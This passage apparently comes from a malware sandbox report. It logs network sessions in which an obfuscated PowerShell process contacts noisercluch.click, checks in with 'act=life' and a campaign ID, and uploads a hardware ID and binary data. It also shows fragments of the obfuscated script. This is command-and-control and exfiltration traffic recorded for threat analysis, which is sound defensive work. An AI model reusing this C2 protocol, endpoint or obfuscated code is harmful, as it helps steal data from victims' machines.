((((((574 + $ggJdTVtnpC) * $LFzhNobjZ) - 381) - $ydOtwkFh) * -249678))) - -6))}$QNTZCB = 6while ($QNTZCB -gt 0) { if (($RrHVwNWFkpR -lt 103) -and ($wtycJBQOE -le -517578) -and ($bHCxzCZ -lt 0)) { $PLsnGznRZ =
2025-01-01 16:10:04 UTC	1369	IN	Data Raw: 28 28 2d 35 37 39 20 2a 20 31 34 39 30 29 20 2b 20 2d 39 39 38 32 29 20 2b 20 2d 39 39 29 0d 0a 69 66 20 28 28 2d 37 39 30 20 2d 6c 74 20 24 77 74 79 63 4a 42 51 4f 45 29 20 2d 61 6e 64 20 28 24 56 41 58 70 51 68 20 2d 6e 65 20 24 4a 4f 44 52 52 75 29 20 2d 61 6e 64 20 28 24 5a 6f 4d 77 7a 6f 20 2d 65 71 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 29 20 7b 0d 0a 20 20 20 20 24 4a 4f 44 52 52 75 20 3d 20 28 28 28 28 28 24 58 72 76 4b 6c 6a 20 2d 20 28 28 28 28 28 28 24 5a 63 69 55 6a 75 55 62 59 20 2d 20 2d 36 39 34 36 29 20 2b 20 24 58 72 76 4b 6c 6a 29 20 2a 20 28 28 28 28 28 28 2d 33 38 32 20 2b 20 36 30 31 30 29 20 2a 20 2d 34 29 20 2d 20 33 37 29 20 2a 20 39 39 37 31 29 20 2d 20 24 56 41 58 70 51 68 29 29 29 29 20 2d 20 28 28 28 28 28 24 6e 4e 73 4c 73 Data Ascii: ((-579 * 1490) + -9982) + -99)if ((-790 -lt $wtycJBQOE) -and ($VAXpQh -ne $JODRRu) -and ($ZoMwzo -eq $zfqrqsHsIfm)) { $JODRRu = ((((($XrvKlj - (((((($ZciUjuUbY - -6946) + $XrvKlj) * ((((((-382 + 6010) * -4) - 37) * 9971) - $VAXpQh)))) - ((((($nNsLs
2025-01-01 16:10:04 UTC	177	IN	Data Raw: 20 30 29 20 7b 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 24 7a 64 74 6d 50 43 49 64 6a 65 20 2d 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 20 2a 20 28 28 28 28 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2a 20 2d 38 29 20 2d 20 38 31 35 33 29 20 2a 20 24 4d 6c 6a 77 4a 72 79 70 29 20 2a 20 24 79 49 70 65 6d 75 4f 63 66 29 29 29 20 2a 20 28 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2a 20 2d 38 35 38 29 20 2a 20 2d 34 35 29 20 2a 20 24 76 76 6b 45 44 50 61 62 29 29 29 29 20 2b 20 28 28 28 24 76 76 6b Data Ascii: 0) { $yQUIMHhW = ((((($zdtmPCIdje - $fkuVbXZoeVZ) * ((((($RrHVwNWFkpR * -8) - 8153) * $MljwJryp) * $yIpemuOcf))) * (((($lKvHsvSFKh * -858) * -45) * $vvkEDPab)))) + ((($vvk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49849	188.114.96.3	443	1196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:11:14 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: noisercluch.click
2025-01-01 16:11:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-01 16:11:15 UTC	1131	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 16:11:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2qgqkiplf8kdndjc06ik72pq3t; expires=Sun, 27 Apr 2025 09:57:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q206eadHIDAaRlRWF7Z3Kyxya8T3Cp3ShyIZUdsb8W%2FrqJqyuHtvvNpKAv0zste%2BfMGWz%2BqflRUQzkfiQwLe7cu5RQ4iYbIbhguKRCXlhJmCq2QwNLPe7%2FxAUO6LUQLdrUzB3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3c8bb0c1b43fe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1556&rtt_var=607&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=908&delivery_rate=1767554&cwnd=236&unsent_bytes=0&cid=390e67ce361e0ece&ts=520&x=0"
2025-01-01 16:11:15 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-01 16:11:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49855	188.114.96.3	443	1196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:11:15 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: noisercluch.click
2025-01-01 16:11:15 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 77 65 62 34 34 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=WG6I6S--web44&j=
2025-01-01 16:11:16 UTC	1127	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 16:11:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nkkf29t83cvne0108aamalvd6r; expires=Sun, 27 Apr 2025 09:57:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2YL16HzYmrDzRefsfHF1xX8oBJ7VaOBCvv5KFiD3OQ9YwXJXycdf3xBAQJ6Aj0AWjytrhv2spF9j0f97NNDvHyPDKCA4%2Fl12wIKCCf1ARfmr8lUG2GJOg%2BdvJEcoyzzNdiBC7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3c8c10b5bde96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1587&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=948&delivery_rate=1795817&cwnd=224&unsent_bytes=0&cid=a782c547ce740785&ts=475&x=0"
2025-01-01 16:11:16 UTC	242	IN	Data Raw: 34 39 39 34 0d 0a 48 68 54 43 54 6a 6d 6b 66 53 64 35 64 72 6e 2b 6b 44 63 51 30 41 69 4d 71 78 78 2f 5a 50 2b 36 49 63 55 6c 4f 76 71 7a 62 32 39 6c 4e 72 52 73 41 35 42 52 42 51 6f 54 6d 38 54 6b 52 57 57 31 4a 4b 37 4b 65 46 31 65 6d 64 74 4e 74 6b 41 57 32 4d 55 43 54 53 52 79 6f 79 4a 4b 77 56 45 46 48 41 36 62 78 4d 74 4d 4d 72 56 6d 72 70 45 2b 47 67 36 64 32 30 32 6e 52 46 47 56 77 77 4d 4d 64 6e 69 6c 4a 6c 7a 48 47 55 59 56 47 39 79 62 39 56 5a 36 76 6d 48 68 77 33 46 64 53 4e 33 66 57 2b 63 66 47 4c 66 57 47 77 35 54 64 62 45 6c 47 39 6c 52 58 46 73 54 31 39 79 71 46 58 47 31 61 75 44 4e 65 42 51 4d 6c 39 4a 46 70 6b 46 51 69 74 6f 4a 42 33 5a 32 70 69 64 57 7a 67 31 4c 48 78 7a 58 6e 66 39 57 4d 76 77 71 Data Ascii: 4994HhTCTjmkfSd5drn+kDcQ0AiMqxx/ZP+6IcUlOvqzb29lNrRsA5BRBQoTm8TkRWW1JK7KeF1emdtNtkAW2MUCTSRyoyJKwVEFHA6bxMtMMrVmrpE+Gg6d202nRFGVwwMMdnilJlzHGUYVG9yb9VZ6vmHhw3FdSN3fW+cfGLfWGw5TdbElG9lRXFsT19yqFXG1auDNeBQMl9JFpkFQitoJB3Z2pidWzg1LHxzXnf9WMvwq
2025-01-01 16:11:16 UTC	1369	IN	Data Raw: 36 64 45 2b 52 55 62 4f 36 6b 43 32 56 6b 32 56 77 51 74 4e 59 7a 69 35 62 46 7a 4b 58 78 31 62 48 4e 65 53 39 31 5a 39 74 57 76 75 32 33 45 64 42 5a 58 51 52 36 31 49 56 35 66 66 42 77 70 30 66 36 63 6a 58 4d 34 5a 53 68 68 55 6c 64 7a 31 54 54 4c 71 4b 73 37 5a 66 52 34 53 6b 4d 6b 44 75 41 6c 42 32 4e 59 42 54 53 51 32 70 69 4a 61 79 78 39 58 45 78 2f 51 6d 65 42 65 65 37 39 6e 37 73 52 30 45 67 57 64 33 30 6d 74 53 46 4b 63 33 41 41 4c 66 48 62 67 59 68 76 42 42 77 56 44 56 50 69 5a 34 6c 4a 2b 70 43 6a 55 69 57 46 54 48 39 33 66 54 2b 63 66 47 4a 44 55 44 67 35 33 65 61 4d 6b 55 4e 51 66 56 78 30 5a 33 6f 37 30 55 48 79 34 61 66 7a 44 63 42 73 46 6c 4e 4e 4b 6f 6b 42 63 32 4a 39 4e 43 6d 51 32 2b 47 78 36 79 78 52 4a 45 51 50 62 33 4f 30 62 61 2f 4a Data Ascii: 6dE+RUbO6kC2Vk2VwQtNYzi5bFzKXx1bHNeS91Z9tWvu23EdBZXQR61IV5ffBwp0f6cjXM4ZShhUldz1TTLqKs7ZfR4SkMkDuAlB2NYBTSQ2piJayx9XEx/QmeBee79n7sR0EgWd30mtSFKc3AALfHbgYhvBBwVDVPiZ4lJ+pCjUiWFTH93fT+cfGJDUDg53eaMkUNQfVx0Z3o70UHy4afzDcBsFlNNKokBc2J9NCmQ2+Gx6yxRJEQPb3O0ba/J
2025-01-01 16:11:16 UTC	1369	IN	Data Raw: 42 73 4a 6b 4e 51 44 36 51 64 66 67 4a 46 56 54 56 5a 31 74 43 39 52 68 43 70 47 46 52 72 63 69 72 4a 4b 50 4b 73 71 36 63 55 2b 52 55 61 51 32 55 75 68 56 56 65 56 30 67 4d 44 63 33 4f 76 4a 46 76 47 45 6b 41 66 48 39 43 66 2f 31 46 67 75 47 72 6d 7a 48 38 58 44 4e 32 57 41 36 42 66 47 4d 43 52 50 42 70 33 4e 4a 55 76 56 63 67 59 55 31 73 4c 6c 59 57 79 55 6e 37 79 4d 71 37 45 64 68 67 44 6b 74 6c 4a 71 55 4a 53 6c 4e 6b 44 44 6d 35 35 70 43 78 58 7a 68 56 49 46 52 44 54 6c 66 6c 65 64 4c 4a 72 35 49 6b 77 58 51 47 46 6d 42 76 6e 63 31 2b 55 33 41 4a 50 53 58 57 75 49 6c 7a 51 58 31 70 56 44 5a 75 62 2f 68 55 71 38 6d 62 6e 79 58 55 58 41 70 33 66 54 71 4a 45 58 35 76 63 43 67 64 79 63 61 51 67 55 73 73 5a 52 52 77 51 33 6f 37 33 58 48 36 2b 4b 71 43 4a Data Ascii: BsJkNQD6QdfgJFVTVZ1tC9RhCpGFRrcirJKPKsq6cU+RUaQ2UuhVVeV0gMDc3OvJFvGEkAfH9Cf/1FguGrmzH8XDN2WA6BfGMCRPBp3NJUvVcgYU1sLlYWyUn7yMq7EdhgDktlJqUJSlNkDDm55pCxXzhVIFRDTlfledLJr5IkwXQGFmBvnc1+U3AJPSXWuIlzQX1pVDZub/hUq8mbnyXUXAp3fTqJEX5vcCgdycaQgUssZRRwQ3o73XH6+KqCJ
2025-01-01 16:11:16 UTC	1369	IN	Data Raw: 50 42 41 36 42 4c 47 4d 43 52 42 41 52 75 65 4b 34 6c 56 73 41 58 51 68 55 5a 30 4a 72 35 55 6e 57 30 5a 2b 62 45 65 78 34 48 6d 64 4a 52 70 45 78 53 6c 64 74 4e 51 7a 78 78 75 47 77 44 68 6a 68 4a 4d 67 54 41 6a 75 51 56 62 66 78 7a 72 73 35 79 58 56 37 64 32 30 79 75 53 46 43 51 33 67 49 4a 63 6e 43 6d 49 56 37 4a 46 56 63 54 47 74 61 58 2f 56 35 67 73 6d 66 71 78 58 6f 56 44 5a 65 59 44 65 64 41 51 4e 69 4a 54 54 68 78 65 61 41 76 54 59 59 41 43 77 4a 55 33 4a 43 79 44 54 4b 2b 5a 4f 37 47 63 68 45 4e 6c 64 6c 50 71 55 42 64 6b 64 6b 46 48 33 31 79 71 43 31 56 79 52 35 42 48 68 48 66 6d 2f 5a 54 66 66 49 6b 72 73 35 6d 58 56 37 64 39 32 53 53 42 58 6d 69 6b 52 4a 44 5a 54 61 6e 49 42 75 65 58 30 6b 59 47 4e 4f 54 39 46 78 2b 75 47 50 6c 78 58 55 5a 43 Data Ascii: PBA6BLGMCRBARueK4lVsAXQhUZ0Jr5UnW0Z+bEex4HmdJRpExSldtNQzxxuGwDhjhJMgTAjuQVbfxzrs5yXV7d20yuSFCQ3gIJcnCmIV7JFVcTGtaX/V5gsmfqxXoVDZeYDedAQNiJTThxeaAvTYYACwJU3JCyDTK+ZO7GchENldlPqUBdkdkFH31yqC1VyR5BHhHfm/ZTffIkrs5mXV7d92SSBXmikRJDZTanIBueX0kYGNOT9Fx+uGPlxXUZC
2025-01-01 16:11:16 UTC	1369	IN	Data Raw: 6f 52 6c 6d 65 77 77 6f 45 62 6e 69 74 49 31 50 4f 46 6b 51 66 45 64 61 61 2f 6c 39 7a 74 57 54 67 77 54 35 54 52 70 72 41 41 2f 38 48 65 59 6a 4b 48 78 74 78 56 36 30 6a 47 39 6c 52 58 46 73 54 31 39 79 71 46 58 75 67 62 75 50 62 64 78 6f 49 6b 74 74 52 70 6b 70 54 69 74 59 43 43 58 74 36 70 69 4e 64 78 78 70 50 46 78 50 65 6c 2f 31 5a 4d 76 77 71 36 64 45 2b 52 55 61 7a 30 31 43 77 52 46 61 54 78 78 5a 4e 59 7a 69 35 62 46 7a 4b 58 78 31 62 46 39 43 58 39 6c 56 2b 73 6d 37 6a 79 57 77 53 41 5a 72 52 53 4c 56 4e 58 35 2f 61 42 51 5a 7a 63 4c 49 67 56 64 51 61 56 77 6c 55 6c 64 7a 31 54 54 4c 71 4b 74 6a 4f 62 67 30 46 33 2b 6c 56 70 46 46 54 6c 64 31 4e 45 6a 4a 76 34 43 74 58 68 6b 63 46 48 52 76 53 6e 2f 31 55 65 37 35 6e 36 38 42 37 48 41 43 5a 30 6b Data Ascii: oRlmewwoEbnitI1POFkQfEdaa/l9ztWTgwT5TRprAA/8HeYjKHxtxV60jG9lRXFsT19yqFXugbuPbdxoIkttRpkpTitYCCXt6piNdxxpPFxPel/1ZMvwq6dE+RUaz01CwRFaTxxZNYzi5bFzKXx1bF9CX9lV+sm7jyWwSAZrRSLVNX5/aBQZzcLIgVdQaVwlUldz1TTLqKtjObg0F3+lVpFFTld1NEjJv4CtXhkcFHRvSn/1Ue75n68B7HACZ0k
2025-01-01 16:11:16 UTC	1369	IN	Data Raw: 32 4d 35 44 46 44 78 78 72 47 77 44 68 68 78 43 47 42 58 52 6c 66 35 61 64 62 5a 34 35 4d 35 73 48 41 65 57 31 55 2b 6e 53 6c 57 53 30 41 51 41 63 48 75 6e 4b 31 54 44 58 77 74 62 45 38 50 63 71 68 56 54 76 32 48 69 6b 69 52 64 47 64 50 42 41 36 42 4c 47 4d 43 52 44 51 64 35 66 4b 30 76 56 4d 55 4e 52 42 30 47 32 35 48 34 52 33 69 35 62 2b 50 45 63 78 34 41 6d 39 4e 50 74 55 35 59 6d 39 70 4e 51 7a 78 78 75 47 77 44 68 6a 78 53 44 52 37 63 6b 4f 52 65 63 37 46 38 34 39 6b 2b 55 30 61 4d 33 31 4c 6e 48 30 36 49 78 67 6f 53 4d 6d 2f 67 4b 31 65 47 52 77 55 64 48 64 32 62 39 46 74 67 74 32 7a 68 78 6e 63 55 41 70 58 62 51 36 4e 44 58 35 33 53 41 51 5a 37 64 61 38 6f 55 73 67 57 53 6c 74 61 6d 35 76 71 46 53 72 79 53 2f 58 4b 63 68 42 47 67 70 5a 61 35 30 42 Data Ascii: 2M5DFDxxrGwDhhxCGBXRlf5adbZ45M5sHAeW1U+nSlWS0AQAcHunK1TDXwtbE8PcqhVTv2HikiRdGdPBA6BLGMCRDQd5fK0vVMUNRB0G25H4R3i5b+PEcx4Am9NPtU5Ym9pNQzxxuGwDhjxSDR7ckORec7F849k+U0aM31LnH06IxgoSMm/gK1eGRwUdHd2b9Ftgt2zhxncUApXbQ6NDX53SAQZ7da8oUsgWSltam5vqFSryS/XKchBGgpZa50B
2025-01-01 16:11:16 UTC	1369	IN	Data Raw: 55 30 6b 4e 6f 41 6e 54 63 4d 59 55 31 6b 68 32 4a 4c 38 55 6d 54 79 64 64 47 48 50 68 49 63 33 59 42 36 76 67 64 66 6c 4a 46 56 54 57 6c 78 6f 43 74 42 30 42 68 4a 43 68 2f 57 6b 4e 42 61 64 61 52 70 34 63 70 76 46 45 71 57 31 51 50 70 42 31 2b 41 6b 56 56 4e 55 33 47 32 4c 33 54 46 44 6b 78 62 57 70 75 62 35 42 55 71 38 6c 53 75 32 33 30 4e 42 5a 4c 4a 66 65 63 66 51 61 61 52 42 68 74 37 5a 71 4d 36 55 4d 73 54 56 43 56 55 67 38 69 67 42 79 44 67 4f 50 47 4a 59 53 4a 49 33 64 6b 44 2f 33 35 42 32 4d 64 4e 56 53 34 34 34 44 34 62 6e 6c 38 43 47 41 62 4a 6d 76 46 44 63 66 56 55 30 4f 35 6f 46 77 47 4e 33 31 53 6f 42 78 62 59 33 6b 31 56 52 54 61 70 4b 30 44 58 43 55 67 4c 45 35 75 6a 76 42 56 71 38 6a 4b 75 2f 48 30 54 43 4a 72 4f 55 75 70 67 54 70 4c 57 Data Ascii: U0kNoAnTcMYU1kh2JL8UmTyddGHPhIc3YB6vgdflJFVTWlxoCtB0BhJCh/WkNBadaRp4cpvFEqW1QPpB1+AkVVNU3G2L3TFDkxbWpub5BUq8lSu230NBZLJfecfQaaRBht7ZqM6UMsTVCVUg8igByDgOPGJYSJI3dkD/35B2MdNVS444D4bnl8CGAbJmvFDcfVU0O5oFwGN31SoBxbY3k1VRTapK0DXCUgLE5ujvBVq8jKu/H0TCJrOUupgTpLW
2025-01-01 16:11:16 UTC	1369	IN	Data Raw: 72 67 59 68 76 54 46 45 6b 64 47 63 37 54 34 30 4e 78 70 47 32 69 77 57 38 51 43 74 33 6e 44 65 64 66 47 4d 43 52 4f 41 35 79 65 4b 63 36 53 6f 73 2f 54 68 63 58 31 35 33 31 46 54 7a 79 62 4b 36 52 4c 56 4e 47 6d 63 6b 44 2f 78 63 4b 77 34 52 65 57 69 77 6b 76 32 4a 43 68 67 6b 46 51 30 61 56 33 4f 41 56 4b 76 49 74 37 64 74 73 47 77 57 4c 32 77 53 5a 65 56 6d 56 33 6b 45 44 64 33 61 6e 50 45 33 64 55 30 30 59 44 73 47 69 7a 48 35 2b 74 47 33 30 7a 6e 67 37 4a 74 32 57 41 36 67 48 41 4b 47 52 52 55 31 44 4f 4f 41 30 47 35 35 66 63 42 67 61 31 5a 76 6b 52 44 2b 61 53 64 54 7a 50 44 45 42 69 4a 70 33 6f 46 64 4a 6b 39 77 42 54 54 49 32 70 6d 77 44 6c 6c 45 46 48 77 57 62 78 4b 49 48 4b 65 63 35 75 5a 6b 73 41 6b 69 45 6d 46 58 6e 48 77 72 57 6b 52 39 4e 4a Data Ascii: rgYhvTFEkdGc7T40NxpG2iwW8QCt3nDedfGMCROA5yeKc6Sos/ThcX1531FTzybK6RLVNGmckD/xcKw4ReWiwkv2JChgkFQ0aV3OAVKvIt7dtsGwWL2wSZeVmV3kEDd3anPE3dU00YDsGizH5+tG30zng7Jt2WA6gHAKGRRU1DOOA0G55fcBga1ZvkRD+aSdTzPDEBiJp3oFdJk9wBTTI2pmwDllEFHwWbxKIHKec5uZksAkiEmFXnHwrWkR9NJ
2025-01-01 16:11:16 UTC	1369	IN	Data Raw: 44 6c 56 45 46 43 56 53 44 33 4c 56 62 66 37 4e 70 34 4d 70 73 44 77 43 65 7a 6b 44 67 65 57 61 39 33 41 41 49 63 6e 47 65 45 6e 72 4d 44 30 67 55 45 35 6d 38 39 55 4e 78 6a 46 54 5a 32 48 6b 4e 52 4c 76 62 56 61 51 48 46 74 6a 4a 54 56 55 38 56 36 6f 38 56 73 6b 59 42 7a 73 54 7a 5a 2b 79 47 7a 4b 32 4b 72 61 4a 57 78 41 4c 6d 4e 5a 45 35 57 5a 53 69 4e 77 43 43 6a 35 57 70 7a 70 59 68 6c 45 46 46 31 53 44 33 50 4e 66 59 72 39 6c 36 59 56 35 42 77 48 64 6c 67 4f 70 42 77 44 59 30 41 63 64 63 58 6d 6e 59 46 33 49 45 51 55 45 57 73 4c 63 35 42 55 71 34 53 53 75 32 7a 35 46 52 74 72 62 55 62 56 42 57 34 37 53 53 6a 4e 43 57 37 49 72 53 38 56 64 64 42 59 51 7a 59 6e 78 52 58 57 4d 56 4d 50 62 65 51 30 46 33 2b 6c 56 70 45 64 57 6e 35 46 44 54 57 51 32 2b 47 Data Ascii: DlVEFCVSD3LVbf7Np4MpsDwCezkDgeWa93AAIcnGeEnrMD0gUE5m89UNxjFTZ2HkNRLvbVaQHFtjJTVU8V6o8VskYBzsTzZ+yGzK2KraJWxALmNZE5WZSiNwCCj5WpzpYhlEFF1SD3PNfYr9l6YV5BwHdlgOpBwDY0AcdcXmnYF3IEQUEWsLc5BUq4SSu2z5FRtrbUbVBW47SSjNCW7IrS8VddBYQzYnxRXWMVMPbeQ0F3+lVpEdWn5FDTWQ2+G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49865	188.114.96.3	443	1196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:11:17 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QCN9PQE8F9B0U7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18139 Host: noisercluch.click
2025-01-01 16:11:17 UTC	15331	OUT	Data Raw: 2d 2d 51 43 4e 39 50 51 45 38 46 39 42 30 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 51 43 4e 39 50 51 45 38 46 39 42 30 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 43 4e 39 50 51 45 38 46 39 42 30 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 51 43 4e 39 50 51 45 38 Data Ascii: --QCN9PQE8F9B0U7Content-Disposition: form-data; name="hwid"F9303BDA56946A72D9AC212D15D33917--QCN9PQE8F9B0U7Content-Disposition: form-data; name="pid"2--QCN9PQE8F9B0U7Content-Disposition: form-data; name="lid"WG6I6S--web44--QCN9PQE8
2025-01-01 16:11:17 UTC	2808	OUT	Data Raw: e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 Data Ascii: (u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2025-01-01 16:11:17 UTC	1139	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 16:11:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jhtasqc52vgk849cetmn8c0jnk; expires=Sun, 27 Apr 2025 09:57:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjBQUuk%2F8gbvc8qb4J1TkErJ%2FzQfBaU7pxrRtyvRPwITcgM9AKDvZhlmAgWKVAkM%2FVaLZzgQPdOFoRu5fI%2FCTUHpZEBzIgnSL7lyxVsZNsV06eP63UCP3J%2FJcJgoKAt%2FA0KhpA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3c8c7ecbdde98-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1642&rtt_var=626&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19098&delivery_rate=1734997&cwnd=212&unsent_bytes=0&cid=cdf7651f60cd7771&ts=607&x=0"
2025-01-01 16:11:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 16:11:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49871	188.114.96.3	443	1196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:11:18 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8YGJKPGFYZMNNEC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8766 Host: noisercluch.click
2025-01-01 16:11:18 UTC	8766	OUT	Data Raw: 2d 2d 38 59 47 4a 4b 50 47 46 59 5a 4d 4e 4e 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 38 59 47 4a 4b 50 47 46 59 5a 4d 4e 4e 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 59 47 4a 4b 50 47 46 59 5a 4d 4e 4e 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 